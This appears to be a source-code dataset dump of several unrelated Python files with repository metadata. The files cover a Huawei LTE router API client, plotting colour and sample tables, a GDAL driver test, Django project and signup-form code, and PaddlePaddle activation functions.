from huawei_lte_api.api.MLog import MLog
class Client:
def __init__(self, connection: Connection): # pylint: disable=too-many-statements
self.monitoring = Monitoring(connection)
self.security = Security(connection)
self.webserver = WebServer(connection)
self.global_ = Global_(connection)
self.wlan = WLan(connection)
self.cradle = Cradle(connection)
self.pin = Pin(connection)
self.config_dialup = DialUpConfig(connection)
self.config_global = Global(connection)
self.config_lan = LanConfig(connection)
self.config_network = NetworkConfig(connection)
self.config_pincode = PincodeConfig(connection)
self.config_sms = SmsConfig(connection)
self.config_voice = Voice(connection)
self.config_wifi = WifiConfig(connection)
self.config_pc_assistant = PcAssistant(connection)
self.config_device_information = DeviceInformation(connection)
self.config_web_ui_cfg = WebUICfg(connection)
self.config_device = DeviceConfig(connection)
self.config_fast_boot = FastBoot(connection)
self.config_firewall = Firewall(connection)
self.config_ipv6 = IPv6(connection)
self.config_ota = OtaConfig(connection)
self.config_pb = PbConfig(connection)
self.config_sntp = Sntp(connection)
self.config_statistic = ConfigStatistic(connection)
self.config_stk = Stk(connection)
self.config_update = Update(connection)
self.config_u_pnp = UPnp(connection)
self.config_ussd = Ussd(connection)
self.config_web_sd = WebSd(connection)
self.usermanual_public_sys_resources = PublicSysResources(connection)
self.ota = Ota(connection)
self.net = Net(connection)
self.dial_up = DialUp(connection)
self.sms = Sms(connection)
self.redirection = Redirection(connection)
self.v_sim = VSim(connection)
self.file_manager = FileManager(connection)
self.dhcp = Dhcp(connection)
self.d_dns = DDns(connection)
self.diagnosis = Diagnosis(connection)
self.s_ntp = SNtp(connection)
self.user = User(connection)
self.device = Device(connection)
self.online_update = OnlineUpdate(connection)
self.log = Log(connection)
self.time = Time(connection)
self.sd_card = SdCard(connection)
self.usb_storage = UsbStorage(connection)
self.usb_printer = UsbPrinter(connection)
self.vpn = Vpn(connection)
self.ntwk = Ntwk(connection)
self.pb = Pb(connection)
self.host = Host(connection)
self.language = Language(connection)
self.syslog = Syslog(connection)
self.voice = Voice_(connection)
self.cwmp = Cwmp(connection)
self.lan = Lan(connection)
self.led = Led(connection)
self.statistic = Statistic(connection)
self.timerule = TimeRule(connection)
self.bluetooth = Bluetooth(connection)
self.mlog = MLog(connection)
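# Usage sketch (an assumption, not taken from this repository): Client is a thin
# facade that wires every endpoint group to a single Connection, so one prepared
# connection object is all a caller needs to pass in. Assumes the Device endpoint
# exposes an information() call, as in the library's documented quick start.
def print_device_info(connection):
    """`connection` is a huawei_lte_api Connection already set up for the router."""
    client = Client(connection)
    info = client.device.information()  # device details as reported by the router
    print(info)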
| 46.147059
| 86
| 0.773582
|
794e24f954bf9531a4ba99da6cffc088d9380a79
| 12,526
|
py
|
Python
|
scripts/NGS/plotutils.py
|
shivankurkapoor/moleculardating
|
4a72c3e92a09ab321e0d92840cc7619857bbab8a
|
[
"BSD-3-Clause"
] | 1
|
2018-04-24T04:38:33.000Z
|
2018-04-24T04:38:33.000Z
|
scripts/NGS/plotutils.py
|
shivankurkapoor/molecular-dating
|
4a72c3e92a09ab321e0d92840cc7619857bbab8a
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/NGS/plotutils.py
|
shivankurkapoor/molecular-dating
|
4a72c3e92a09ab321e0d92840cc7619857bbab8a
|
[
"BSD-3-Clause"
] | null | null | null |
cnames = {
'palegoldenrod': '#EEE8AA',
'palegreen': '#98FB98',
'paleturquoise': '#AFEEEE',
'palevioletred': '#DB7093',
'papayawhip': '#FFEFD5',
'peachpuff': '#FFDAB9',
'peru': '#CD853F',
'pink': '#FFC0CB',
'plum': '#DDA0DD',
'powderblue': '#B0E0E6',
'purple': '#800080',
'red': '#FF0000',
'rosybrown': '#BC8F8F',
'royalblue': '#4169E1',
'saddlebrown': '#8B4513',
'salmon': '#FA8072',
'sandybrown': '#FAA460',
'seagreen': '#2E8B57',
'seashell': '#FFF5EE',
'darkblue': '#00008B',
'darkcyan': '#008B8B',
'darkgoldenrod': '#B8860B',
'darkgreen': '#006400',
'darkkhaki': '#BDB76B',
'darkmagenta': '#8B008B',
'darkolivegreen': '#556B2F',
'darkorange': '#FF8C00',
'darkorchid': '#9932CC',
'darkred': '#8B0000',
'darksalmon': '#E9967A',
'darkseagreen': '#8FBC8F',
'darkslateblue': '#483D8B',
'darkturquoise': '#00CED1',
'darkviolet': '#9400D3',
'deeppink': '#FF1493',
'deepskyblue': '#00BFFF',
'dodgerblue': '#1E90FF',
'firebrick': '#B22222',
'forestgreen': '#228B22',
'fuchsia': '#FF00FF',
'gainsboro': '#DCDCDC',
'gold': '#FFD700',
'goldenrod': '#DAA520',
'green': '#008000',
'hotpink': '#FF69B4',
'indianred': '#CD5C5C',
'indigo': '#4B0082',
'ivory': '#FFFFF0',
'khaki': '#F0E68C',
'lawngreen': '#7CFC00',
'lemonchiffon': '#FFFACD',
'aliceblue': '#F0F8FF',
'aqua': '#00FFFF',
'aquamarine': '#7FFFD4',
'azure': '#F0FFFF',
'beige': '#F5F5DC',
'black': '#000000',
'blanchedalmond': '#FFEBCD',
'blue': '#0000FF',
'blueviolet': '#8A2BE2',
'brown': '#A52A2A',
'burlywood': '#DEB887',
'cadetblue': '#5F9EA0',
'chartreuse': '#7FFF00',
'chocolate': '#D2691E',
'coral': '#FF7F50',
'crimson': '#DC143C',
'cyan': '#00FFFF',
'lime': '#00FF00',
'limegreen': '#32CD32',
'linen': '#FAF0E6',
'magenta': '#FF00FF',
'maroon': '#800000',
'midnightblue': '#191970',
'mintcream': '#F5FFFA',
'mistyrose': '#FFE4E1',
'moccasin': '#FFE4B5',
'navy': '#000080',
'oldlace': '#FDF5E6',
'olive': '#808000',
'olivedrab': '#6B8E23',
'orange': '#FFA500',
'orangered': '#FF4500',
'orchid': '#DA70D6',
'sienna': '#A0522D',
'silver': '#C0C0C0',
'skyblue': '#87CEEB',
'slateblue': '#6A5ACD',
'springgreen': '#00FF7F',
'steelblue': '#4682B4',
'teal': '#008080',
'thistle': '#D8BFD8',
'tomato': '#FF6347',
'turquoise': '#40E0D0',
'violet': '#EE82EE',
'mediumaquamarine': '#66CDAA',
'mediumblue': '#0000CD',
'mediumorchid': '#BA55D3',
'mediumpurple': '#9370DB',
'mediumseagreen': '#3CB371',
'mediumslateblue': '#7B68EE',
'mediumspringgreen': '#00FA9A',
'mediumturquoise': '#48D1CC',
'mediumvioletred': '#C71585',
}
filled_markers = [u'o', u'v', u'^', u'<', u'>', u'8', u's', u'p', u'*', u'h', u'H', u'D', u'd']
'''
Points with S2 <=5.0
'''
tuplist = [('CH256', 0),
('CH256', 172),
('CH256', 426),
('CH256', 684),
('CH256', 28),
('CH256', 63),
('PIC83747', 0),
('PIC83747', 6),
('PIC83747', 50),
('PIC90770', 193),
('PIC90770', 8),
('PIC90770', 96),
('PIC90770', 12),
('PIC90770', 125),
('R880F', 0),
('R880F', 147),
('R880F', 63),
('CH470', 0),
('CH470', 41),
('CH470', 13),
('CH470', 174),
('CH470', 69),
('CH159', 0),
('CH159', 648),
('CH159', 12),
('CH159', 302),
('CH159', 8),
('CH159', 85),
('CH159', 22),
('CH159', 56),
('CH159', 29),
('9004SS', 0),
('9004SS', 29),
('CAP239', 0),
('CAP239', 119),
('CAP210', 0),
('CAP210', 168),
('CAP210', 140),
('CAP210', 70),
('SUMA', 0),
('SUMA', 1),
('SUMA', 30),
('SUMA', 16),
('SUMA', 9),
('CH131', 0),
('CH131', 34),
('CH131', 333),
('CH131', 175),
('CH131', 273),
('CH131', 21),
('CH131', 91),
('CH131', 28),
('CH131', 670),
('CH131', 63),
('1056', 0),
('1056', 3),
('1056', 7),
('1058', 0),
('1058', 10),
('1058', 3),
('1059', 0),
('1059', 4),
('1059', 7),
('CH042', 0),
('CH042', 676),
('CH042', 424),
('CH042', 172),
('CH042', 21),
('CH042', 60),
('CH040', 0),
('CH040', 45),
('CH040', 412),
('CH040', 111),
('CAP45', 0),
('CAP45', 21),
('CH185', 0),
('CH185', 25),
('CH185', 67),
('CH185', 416),
('CH185', 180),
('K84', 0),
('K84', 24),
('6247', 0),
('6247', 2),
('R053', 0),
('R053', 8),
('R526', 0),
('R526', 65),
('703010200', 0),
('CH164', 0),
('CH164', 169),
('CH164', 420),
('CH164', 14),
('CH164', 56),
('WEAU', 0),
('WEAU', 8),
('WEAU', 29),
('WEAU', 197),
('WEAU', 15),
('CH162', 0),
('CH162', 179),
('CH162', 21),
('CH162', 438),
('CH162', 77),
('H386', 0),
('H386', 9),
('PIC55751', 0),
('191647', 0),
('191647', 127),
('PIC1362', 0),
('H408', 0),
('PIC38417', 0),
('PIC38417', 8),
('PIC71101', 0),
('PIC71101', 37),
('PIC71101', 6),
('PIC71101', 174),
('PIC71101', 14),
('PIC71101', 120),
('TT31P', 0),
('TT31P', 11),
('CH198', 0),
('CH198', 11),
('CH198', 60),
('CH198', 447),
('PIC38051', 0),
('PIC38051', 4),
('CH077', 0),
('CH077', 32),
('CH077', 14),
('CH077', 159),
('CH058', 0),
('CH058', 76),
('CH058', 36),
('CH607', 0),
('CH607', 21),
('CH607', 14),
('R463F', 0),
('R463F', 7),
('R463F', 236),
('R463F', 48),
]
# S2<=5
type_list = [('CH256', 0, 'Single'),
('CH256', 172, 'Single'),
('CH256', 426, 'Single'),
('CH256', 684, 'Single'),
('CH256', 28, 'Single'),
('CH256', 63, 'Single'),
('PIC83747', 0, 'Multiple'),
('PIC83747', 6, 'Multiple'),
('PIC83747', 50, 'Multiple'),
('PIC90770', 193, 'Multiple'),
('PIC90770', 8, 'Multiple'),
('PIC90770', 96, 'Multiple'),
('PIC90770', 12, 'Multiple'),
('PIC90770', 125, 'Multiple'),
('R880F', 0, 'Single'),
('R880F', 147, 'Single'),
('R880F', 63, 'Single'),
('CH470', 0, 'Single'),
('CH470', 41, 'Single'),
('CH470', 13, 'Single'),
('CH470', 174, 'Single'),
('CH470', 69, 'Single'),
('CH159', 0, 'Single'),
('CH159', 648, 'Single'),
('CH159', 12, 'Single'),
('CH159', 302, 'Single'),
('CH159', 8, 'Single'),
('CH159', 85, 'Single'),
('CH159', 22, 'Single'),
('CH159', 56, 'Single'),
('CH159', 29, 'Single'),
('9004SS', 0, 'Single'),
('9004SS', 29, 'Single'),
('CAP239', 0, 'Single'),
('CAP239', 119, 'Single'),
('CAP210', 0, 'Single'),
('CAP210', 168, 'Single'),
('CAP210', 140, 'Single'),
('CAP210', 70, 'Single'),
('SUMA', 0, 'Single'),
('SUMA', 1, 'Single'),
('SUMA', 30, 'Single'),
('SUMA', 16, 'Single'),
('SUMA', 9, 'Single'),
('CH131', 0, 'Single'),
('CH131', 34, 'Single'),
('CH131', 333, 'Single'),
('CH131', 175, 'Single'),
('CH131', 273, 'Single'),
('CH131', 21, 'Single'),
('CH131', 91, 'Single'),
('CH131', 28, 'Single'),
('CH131', 670, 'Single'),
('CH131', 63, 'Single'),
('1056', 0, 'Single'),
('1056', 3, 'Single'),
('1056', 7, 'Single'),
('1058', 0, 'Single'),
('1058', 10, 'Single'),
('1058', 3, 'Single'),
('1059', 0, 'Multiple'),
('1059', 4, 'Multiple'),
('1059', 7, 'Multiple'),
('CH042', 0, 'Single'),
('CH042', 676, 'Single'),
('CH042', 424, 'Single'),
('CH042', 172, 'Single'),
('CH042', 21, 'Single'),
('CH042', 60, 'Single'),
('CH040', 0, 'Single'),
('CH040', 45, 'Single'),
('CH040', 412, 'Single'),
('CH040', 111, 'Single'),
('CAP45', 0, 'Single'),
('CAP45', 21, 'Single'),
('CH185', 0, 'Single'),
('CH185', 25, 'Single'),
('CH185', 67, 'Single'),
('CH185', 416, 'Single'),
('CH185', 180, 'Single'),
('K84', 0, 'Single'),
('K84', 24, 'Single'),
('6247', 0, 'Single'),
('6247', 2, 'Single'),
('R053', 0, 'Single'),
('R053', 8, 'Single'),
('R526', 0, 'Single'),
('R526', 65, 'Single'),
('703010200', 0, 'Multiple'),
('CH164', 0, 'Single'),
('CH164', 169, 'Single'),
('CH164', 420, 'Single'),
('CH164', 14, 'Single'),
('CH164', 56, 'Single'),
('WEAU', 0, 'Single'),
('WEAU', 8, 'Single'),
('WEAU', 29, 'Single'),
('WEAU', 197, 'Single'),
('WEAU', 15, 'Single'),
('CH162', 0, 'Single'),
('CH162', 179, 'Single'),
('CH162', 21, 'Single'),
('CH162', 438, 'Single'),
('CH162', 77, 'Single'),
('H386', 0, 'Single'),
('H386', 9, 'Single'),
('PIC55751', 0, 'Multiple'),
('191647', 0, 'Single'),
('191647', 127, 'Single'),
('PIC1362', 0, 'Single'),
('H408', 0, 'Multiple'),
('PIC38417', 0, 'Multiple'),
('PIC38417', 8, 'Multiple'),
('PIC71101', 0, 'Single'),
('PIC71101', 37, 'Single'),
('PIC71101', 6, 'Single'),
('PIC71101', 174, 'Single'),
('PIC71101', 14, 'Single'),
('PIC71101', 120, 'Single'),
('TT31P', 0, 'Single'),
('TT31P', 11, 'Single'),
('CH198', 0, 'Single'),
('CH198', 11, 'Single'),
('CH198', 60, 'Single'),
('CH198', 447, 'Single'),
('PIC38051', 0, 'Single'),
('PIC38051', 4, 'Single'),
('CH077', 0, 'Single'),
('CH077', 32, 'Single'),
('CH077', 14, 'Single'),
('CH077', 159, 'Single'),
('CH058', 0, 'Single'),
('CH058', 76, 'Single'),
('CH058', 36, 'Single'),
('CH607', 0, 'Single'),
('CH607', 21, 'Single'),
('CH607', 14, 'Single'),
('R463F', 0, 'Single'),
('R463F', 7, 'Single'),
('R463F', 236, 'Single'),
('R463F', 48, 'Single'), ]
| 31.472362
| 96
| 0.357975
|
794e252a6923a3e368203e7308f80bf4d86aac85
| 3,089
|
py
|
Python
|
autotest/gdrivers/genbin.py
|
tbonfort/gdal
|
173e0659bc3f2e6b97c2c07332a3066478afb821
|
[
"MIT"
] | 1
|
2015-04-21T19:52:03.000Z
|
2015-04-21T19:52:03.000Z
|
autotest/gdrivers/genbin.py
|
tbonfort/gdal
|
173e0659bc3f2e6b97c2c07332a3066478afb821
|
[
"MIT"
] | 7
|
2018-04-09T09:35:42.000Z
|
2018-05-22T06:54:05.000Z
|
autotest/gdrivers/genbin.py
|
pramsey/gdal
|
965421b79fe4d3332b0f2f633b072fdcab2b700a
|
[
"MIT"
] | 2
|
2018-05-08T01:51:34.000Z
|
2019-06-26T05:08:56.000Z
|
#!/usr/bin/env python
###############################################################################
# $Id$
#
# Project: GDAL/OGR Test Suite
# Purpose: Test Generic Binary format driver.
# Author: Frank Warmerdam <warmerdam@pobox.com>
#
###############################################################################
# Copyright (c) 2007, Frank Warmerdam <warmerdam@pobox.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import sys
sys.path.append( '../pymod' )
import gdaltest
###############################################################################
# Perform simple read test.
def genbin_1():
tst = gdaltest.GDALTest( 'GenBin', 'tm4628_96.bil', 1, 5738,
0, 0, 500, 1 )
prj = """PROJCS["NAD27 / Washington South",
GEOGCS["NAD27",
DATUM["North_American_Datum_1927",
SPHEROID["Clarke 1866",6378206.4,294.9786982138982,
AUTHORITY["EPSG","7008"]],
AUTHORITY["EPSG","6267"]],
PRIMEM["Greenwich",0,
AUTHORITY["EPSG","8901"]],
UNIT["degree",0.01745329251994328,
AUTHORITY["EPSG","9122"]],
AUTHORITY["EPSG","4267"]],
UNIT["US survey foot",0.3048006096012192,
AUTHORITY["EPSG","9003"]],
PROJECTION["Lambert_Conformal_Conic_2SP"],
PARAMETER["standard_parallel_1",45.83333333333334],
PARAMETER["standard_parallel_2",47.33333333333334],
PARAMETER["latitude_of_origin",45.33333333333334],
PARAMETER["central_meridian",-120.5],
PARAMETER["false_easting",2000000],
PARAMETER["false_northing",0],
AUTHORITY["EPSG","32049"],
AXIS["X",EAST],
AXIS["Y",NORTH]]"""
gt = (1181700.9894981384, 82.021003723042099, 0.0,
596254.01050186157, 0.0, -82.021003723045894 )
return tst.testOpen( check_prj = prj, check_gt = gt )
gdaltest_list = [
genbin_1
]
if __name__ == '__main__':
gdaltest.setup_run( 'genbin' )
gdaltest.run_tests( gdaltest_list )
gdaltest.summarize()
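# GDAL-free sketch (hypothetical helper) approximating the geotransform comparison
# that tst.testOpen(check_gt=gt) performs above: each of the six coefficients must
# match the expected value within a small relative tolerance.
def geotransform_matches(actual, expected, tolerance=1e-6):
    if len(actual) != 6 or len(expected) != 6:
        return False
    return all(abs(a - e) <= tolerance * max(1.0, abs(e))
               for a, e in zip(actual, expected))

if __name__ == '__main__':
    gt = (1181700.9894981384, 82.021003723042099, 0.0,
          596254.01050186157, 0.0, -82.021003723045894)
    print(geotransform_matches(gt, gt))          # True
    print(geotransform_matches(gt, (0.0,) * 6))  # False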
| 35.505747
| 79
| 0.616704
|
794e25acc1e2d8199bffb7b683c74d17997c4047
| 254
|
py
|
Python
|
Alba/albaproject/manage.py
|
marcos-sb/quick-openstacked-hadoop
|
ae40d842b31a16e212d1474e9cd8e8f022be99a8
|
[
"Apache-2.0"
] | null | null | null |
Alba/albaproject/manage.py
|
marcos-sb/quick-openstacked-hadoop
|
ae40d842b31a16e212d1474e9cd8e8f022be99a8
|
[
"Apache-2.0"
] | null | null | null |
Alba/albaproject/manage.py
|
marcos-sb/quick-openstacked-hadoop
|
ae40d842b31a16e212d1474e9cd8e8f022be99a8
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "albaproject.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| 23.090909
| 75
| 0.775591
|
794e26220fe4d90ac9f974ada53e62b4fe0a538b
| 2,123
|
py
|
Python
|
users/forms.py
|
edevars/taco_blog
|
b21ffee6899e07928f40ec85a8ff40872b9a77a9
|
[
"MIT"
] | null | null | null |
users/forms.py
|
edevars/taco_blog
|
b21ffee6899e07928f40ec85a8ff40872b9a77a9
|
[
"MIT"
] | null | null | null |
users/forms.py
|
edevars/taco_blog
|
b21ffee6899e07928f40ec85a8ff40872b9a77a9
|
[
"MIT"
] | null | null | null |
# Django
from django import forms
from django.contrib.auth.models import User
from users.models import Profile
class SignupForm(forms.Form):
"""Sign up form."""
username = forms.CharField(label=False, min_length=4, max_length=50, widget=forms.TextInput(
attrs={'placeholder': 'Usuario', 'class': 'input mb-4', 'required': True}))
password = forms.CharField(label=False, max_length=70, widget=forms.PasswordInput(
attrs={'placeholder': 'Escribe tu contraseña', 'class': 'input mb-4', 'required': True}))
password_confirmation = forms.CharField(label=False, max_length=70, widget=forms.PasswordInput(
attrs={'placeholder': 'Confirma tu contraseña', 'class': 'input mb-4', 'required': True}))
first_name = forms.CharField(label=False, min_length=2, max_length=50, widget=forms.TextInput(
attrs={'placeholder': 'Nombres', 'class': 'input mb-4', 'required': True}))
last_name = forms.CharField(label=False, min_length=2, max_length=50, widget=forms.TextInput(
attrs={'placeholder': 'Apellidos', 'class': 'input mb-4', 'required': True}))
email = forms.EmailField(label=False, min_length=6, max_length=70, widget=forms.EmailInput(
attrs={'placeholder': 'Correo electrónico', 'class': 'input mb-4', 'required': True}))
def clean_username(self):
username = self.cleaned_data['username']
username_taken = User.objects.filter(username=username).exists()
if username_taken:
raise forms.ValidationError('Username is already in use.')
return username
def clean(self):
data = super().clean()
password = data['password']
password_confirmation = data['password_confirmation']
if password != password_confirmation:
raise forms.ValidationError('Passwords do not match.')
return data
def save(self):
"""Create user and profile."""
data = self.cleaned_data
data.pop('password_confirmation')
user = User.objects.create_user(**data)
profile = Profile(user=user)
profile.save()
return data
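# Framework-free sketch (hypothetical helper, not part of Django) of the two
# cross-field rules enforced above: the username must be unused and the two
# password fields must match.
def validate_signup(data, existing_usernames):
    errors = []
    if data['username'] in existing_usernames:
        errors.append('Username is already in use.')
    if data['password'] != data['password_confirmation']:
        errors.append('Passwords do not match.')
    return errors

if __name__ == '__main__':
    taken = {'existing_user'}
    print(validate_signup(
        {'username': 'new_user', 'password': 'secret123',
         'password_confirmation': 'secret123'}, taken))  # []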
| 37.910714
| 99
| 0.666039
|
794e2659302473b0b01ac49d4338d959051e567f
| 51,260
|
py
|
Python
|
python/paddle/nn/functional/activation.py
|
DevilCarp/Paddle
|
04325d2cbefb029a4478bdc069d3279cd566ac6a
|
[
"Apache-2.0"
] | 2
|
2022-03-30T09:55:45.000Z
|
2022-03-30T09:55:49.000Z
|
python/paddle/nn/functional/activation.py
|
DevilCarp/Paddle
|
04325d2cbefb029a4478bdc069d3279cd566ac6a
|
[
"Apache-2.0"
] | null | null | null |
python/paddle/nn/functional/activation.py
|
DevilCarp/Paddle
|
04325d2cbefb029a4478bdc069d3279cd566ac6a
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ...fluid.layers import sigmoid # noqa: F401
from ...tensor.math import tanh # noqa: F401
from ...tensor.math import tanh_ # noqa: F401
from ...fluid.dygraph.inplace_utils import inplace_apis_in_dygraph_only
from ...tensor.manipulation import chunk
from ...tensor.math import multiply
import warnings
from ...fluid.layer_helper import LayerHelper
from ...fluid.framework import convert_np_dtype_to_dtype_
from ...fluid.data_feeder import check_variable_and_dtype, check_dtype
import paddle
from paddle import _C_ops, in_dynamic_mode
from paddle.framework import core
__all__ = []
def celu(x, alpha=1.0, name=None):
r"""
celu activation.
.. math::
celu(x) = max(0, x) + min(0, \alpha * (e^{x/\alpha}-1))
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
alpha (float, optional): The 'alpha' value of the CELU formulation. Default is 1.0.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
x = paddle.to_tensor([[-1., 6.], [1., 15.6]])
out = F.celu(x, alpha=0.2)
# [[-0.19865242, 6. ],
# [ 1. , 15.60000038]]
"""
if alpha == 0:
raise ZeroDivisionError("alpha cannot be 0 for celu")
if in_dynamic_mode():
return _C_ops.celu(x, 'alpha', alpha)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'celu')
helper = LayerHelper("celu", **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='celu',
inputs={'X': x},
outputs={'Out': out},
attrs={'alpha': alpha})
return out
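# NumPy reference (assumed helper, not a Paddle API) of the celu formula documented
# above: celu(x) = max(0, x) + min(0, alpha * (exp(x / alpha) - 1)).
import numpy as np

def celu_reference(x, alpha=1.0):
    x = np.asarray(x, dtype=np.float64)
    return np.maximum(0.0, x) + np.minimum(0.0, alpha * np.expm1(x / alpha))

# celu_reference([[-1., 6.], [1., 15.6]], alpha=0.2) ~= [[-0.19865, 6.], [1., 15.6]]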
def elu(x, alpha=1.0, name=None):
r"""
elu activation.
.. math::
elu(x)=
\left\{
\begin{array}{lcl}
x,& &\text{if } \ x > 0 \\
alpha * (e^{x} - 1),& &\text{if } \ x <= 0
\end{array}
\right.
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
alpha (float, optional): The 'alpha' value of the ELU formulation. Default is 1.0.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
x = paddle.to_tensor([[-1., 6.], [1., 15.6]])
out = F.elu(x, alpha=0.2)
# [[-0.12642411 6. ]
# [ 1. 15.6 ]]
"""
if in_dynamic_mode():
return _C_ops.elu(x, 'alpha', alpha)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'elu')
helper = LayerHelper("elu", **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='elu',
inputs={'X': x},
outputs={'Out': out},
attrs={'alpha': alpha})
return out
@inplace_apis_in_dygraph_only
def elu_(x, alpha=1.0, name=None):
r"""
Inplace version of ``elu`` API, the output Tensor will be inplaced with input ``x``.
Please refer to :ref:`api_nn_cn_elu`.
"""
    assert alpha >= 0., "elu_ only supports alpha >= 0, please use elu instead."
return _C_ops.elu_(x, 'alpha', alpha)
def gelu(x, approximate=False, name=None):
r"""
gelu activation.
if approximate is True
.. math::
gelu(x) = 0.5 * x * (1 + tanh(\sqrt{\frac{2}{\pi}} * (x + 0.044715x^{3})))
else
.. math::
gelu(x) = 0.5 * x * (1 + erf(\frac{x}{\sqrt{2}}))
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
        approximate (bool, optional): Whether to enable approximation. Default is False.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
x = paddle.to_tensor([[-1, 0.5], [1, 1.5]])
out1 = F.gelu(x)
# [[-0.15865529, 0.34573123],
# [ 0.84134471, 1.39978933]]
out2 = F.gelu(x, True)
# [[-0.15880799, 0.34571400],
# [ 0.84119201, 1.39957154]]
"""
if in_dynamic_mode():
return _C_ops.gelu(x, 'approximate', approximate)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'gelu')
helper = LayerHelper("gelu", **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='gelu',
inputs={'X': x},
outputs={'Out': out},
attrs={'approximate': approximate})
return out
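# NumPy/math reference (assumed helper, not a Paddle API) of both gelu branches
# documented above: the exact erf form and the tanh approximation.
import math
import numpy as np

def gelu_reference(x, approximate=False):
    x = np.asarray(x, dtype=np.float64)
    if approximate:
        return 0.5 * x * (1.0 + np.tanh(math.sqrt(2.0 / math.pi)
                                        * (x + 0.044715 * x ** 3)))
    erf = np.vectorize(math.erf)
    return 0.5 * x * (1.0 + erf(x / math.sqrt(2.0)))

# gelu_reference([-1.0, 0.5]) ~= [-0.15866, 0.34573]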
def hardshrink(x, threshold=0.5, name=None):
r"""
hard shrinkage activation
.. math::
hardshrink(x)=
\left\{
\begin{array}{rcl}
x,& &if \ {x > threshold} \\
x,& &if \ {x < -threshold} \\
0,& &if \ {others} &
\end{array}
\right.
Args:
x (Tensor): The input Tensor with data type float32, float64.
        threshold (float, optional): The value of threshold for hardshrink. Default is 0.5
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
x = paddle.to_tensor([-1, 0.3, 2.5])
out = F.hardshrink(x) # [-1., 0., 2.5]
"""
if in_dynamic_mode():
return _C_ops.hard_shrink(x, 'threshold', threshold)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'hardshrink')
helper = LayerHelper('hardshrink', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='hard_shrink',
inputs={'X': x},
outputs={'Out': out},
attrs={'threshold': threshold})
return out
def hardtanh(x, min=-1.0, max=1.0, name=None):
r"""
hardtanh activation
.. math::
hardtanh(x)=
\left\{
\begin{array}{cll}
max,& & \text{if } x > max \\
min,& & \text{if } x < min \\
x,& & \text{otherwise}
\end{array}
\right.
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
min (float, optional): The minimum value of the linear region range. Default is -1.
max (float, optional): The maximum value of the linear region range. Default is 1.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
A Tensor with the same data type and shape as ``x`` .
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
import numpy as np
x = paddle.to_tensor(np.array([-1.5, 0.3, 2.5]))
out = F.hardtanh(x) # [-1., 0.3, 1.]
"""
if in_dynamic_mode():
return _C_ops.brelu(x, 't_min', min, 't_max', max)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'hardtanh')
helper = LayerHelper('hardtanh', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='brelu',
inputs={'X': x},
outputs={'Out': out},
attrs={'t_min': min,
't_max': max})
return out
def hardsigmoid(x, slope=0.1666667, offset=0.5, name=None):
r"""
hardsigmoid activation.
    A 3-part piecewise linear approximation of sigmoid (https://arxiv.org/abs/1603.00391),
which is much faster than sigmoid.
.. math::
hardsigmoid(x)=
\left\{
\begin{array}{lcl}
0, & &\text{if } \ x \leq -3 \\
1, & &\text{if } \ x \geq 3 \\
slope * x + offset, & &\text{otherwise}
\end{array}
\right.
Parameters:
x (Tensor): The input Tensor with data type float32, float64.
slope (float, optional): The slope of hardsigmoid function. Default is 0.1666667.
